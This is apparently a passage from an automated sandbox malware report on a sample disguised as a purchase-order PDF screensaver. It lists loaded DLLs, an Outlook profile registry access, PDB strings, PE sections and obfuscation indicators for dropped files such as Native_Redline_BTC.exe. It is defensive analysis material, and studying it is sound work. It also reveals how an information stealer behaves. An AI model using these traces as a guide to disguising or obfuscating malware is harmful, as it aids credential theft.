                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                            Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Static file information: File size 6536429 > 1048576
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000004.00000003.2117161798.0000000005820000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVClient.pdb source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdb source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdb source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2787951511.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000005.00000003.2767066626.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVClient.pdbGCTL source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: appvcleaner.exe.5.dr Static PE information: 0xBEAF7172 [Mon May 18 10:01:22 2071 UTC]
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe Static PE information: real checksum: 0xa2135 should be: 0x6402d4
                            Source: armsvc.exe.4.dr Static PE information: real checksum: 0x32318 should be: 0x13ed32
                            Source: Native_Redline_BTC.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x9799b
                            Source: armsvc.exe.4.dr Static PE information: section name: .didat
                            Source: Acrobat.exe.5.dr Static PE information: section name: .didat
                            Source: private_browsing.exe.5.dr Static PE information: section name: .00cfg
                            Source: private_browsing.exe.5.dr Static PE information: section name: .voltbl
                            Source: updater.exe.5.dr Static PE information: section name: .00cfg
                            Source: updater.exe.5.dr Static PE information: section name: .voltbl
                            Source: updater.exe.5.dr Static PE information: section name: _RDATA
                            Source: setup.exe.5.dr Static PE information: section name: .didat
                            Source: setup.exe.5.dr Static PE information: section name: _RDATA
                            Source: IntegratedOffice.exe.5.dr Static PE information: section name: .didat
                            Source: IntegratedOffice.exe.5.dr Static PE information: section name: _RDATA
                            Source: OfficeC2RClient.exe.5.dr Static PE information: section name: .didat
                            Source: OfficeC2RClient.exe.5.dr Static PE information: section name: .detourc
                            Source: officesvcmgr.exe.5.dr Static PE information: section name: .didat
                            Source: alg.exe.5.dr Static PE information: section name: .didat
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: .00cfg
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: .gxfg
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: .retplne
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: LZMADEC
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: _RDATA
                            Source: chrome_pwa_launcher.exe.5.dr Static PE information: section name: malloc_h
                            Source: chrmstp.exe.5.dr Static PE information: section name: .00cfg
                            Source: chrmstp.exe.5.dr Static PE information: section name: .gxfg
                            Source: chrmstp.exe.5.dr Static PE information: section name: .retplne
                            Source: chrmstp.exe.5.dr Static PE information: section name: CPADinfo
                            Source: chrmstp.exe.5.dr Static PE information: section name: LZMADEC
                            Source: chrmstp.exe.5.dr Static PE information: section name: _RDATA
                            Source: chrmstp.exe.5.dr Static PE information: section name: malloc_h
                            Source: GoogleCrashHandler64.exe.5.dr Static PE information: section name: _RDATA
                            Source: GoogleCrashHandler64.exe.5.dr Static PE information: section name: .gxfg
                            Source: GoogleCrashHandler64.exe.5.dr Static PE information: section name: .gehcont
                            Source: FXSSVC.exe.5.dr Static PE information: section name: .didat
                            Source: GoogleUpdateComRegisterShell64.exe.5.dr Static PE information: section name: _RDATA
                            Source: GoogleUpdateComRegisterShell64.exe.5.dr Static PE information: section name: .gxfg
                            Source: GoogleUpdateComRegisterShell64.exe.5.dr Static PE information: section name: .gehcont
                            Source: 117.0.5938.132_chrome_installer.exe.5.dr Static PE information: section name: .00cfg
                            Source: 117.0.5938.132_chrome_installer.exe.5.dr Static PE information: section name: .retplne
                            Source: elevation_service.exe.5.dr Static PE information: section name: .00cfg
                            Source: elevation_service.exe.5.dr Static PE information: section name: .gxfg
                            Source: elevation_service.exe.5.dr Static PE information: section name: .retplne
                            Source: elevation_service.exe.5.dr Static PE information: section name: _RDATA
                            Source: elevation_service.exe.5.dr Static PE information: section name: malloc_h
                            Source: elevation_service.exe0.5.dr Static PE information: section name: .00cfg
                            Source: elevation_service.exe0.5.dr Static PE information: section name: .gxfg
                            Source: elevation_service.exe0.5.dr Static PE information: section name: .retplne
                            Source: elevation_service.exe0.5.dr Static PE information: section name: _RDATA
                            Source: elevation_service.exe0.5.dr Static PE information: section name: malloc_h
                            Source: maintenanceservice.exe.5.dr Static PE information: section name: .00cfg
                            Source: maintenanceservice.exe.5.dr Static PE information: section name: .voltbl
                            Source: maintenanceservice.exe.5.dr Static PE information: section name: _RDATA
                            Source: msdtc.exe.5.dr Static PE information: section name: .didat
                            Source: msiexec.exe.5.dr Static PE information: section name: .didat
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe Code function: 3_2_004171D1 push ecx; ret 3_2_004171E4
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe Code function: 3_2_0049671B pushad ; iretd 3_2_0049671D
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00493419 push edx; iretd 4_2_0049341B
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00492A2E push edi; iretd 4_2_00492A38
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00491C8C push cs; iretd 4_2_00491C8D
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00491B79 push FFFFFF87h; retf 4_2_00491B7C
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00495B0C pushfd ; iretd 4_2_00495B0D
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF7D4Bh; ret 4_2_04AF7D80
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF7DD7h; ret 4_2_04AF7D9F
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF7D5Fh; ret 4_2_04AF7DB3
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF81E6h; ret 4_2_04AF7E2D
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF7FCCh; ret 4_2_04AF82BB
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF7DF0 push 04AF8468h; ret 4_2_04AF852D
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF852Eh; ret 4_2_04AF7F3A
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8514h; ret 4_2_04AF7F66
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF7E66h; ret 4_2_04AF8057
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF817Ah; ret 4_2_04AF808B
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF82E5h; ret 4_2_04AF80D9
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF826Ah; ret 4_2_04AF819E
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF849Ch; ret 4_2_04AF81E4
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF805Ch; ret 4_2_04AF8255
                            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_04AF8550 push 04AF8321h; ret 4_2_04AF82E0
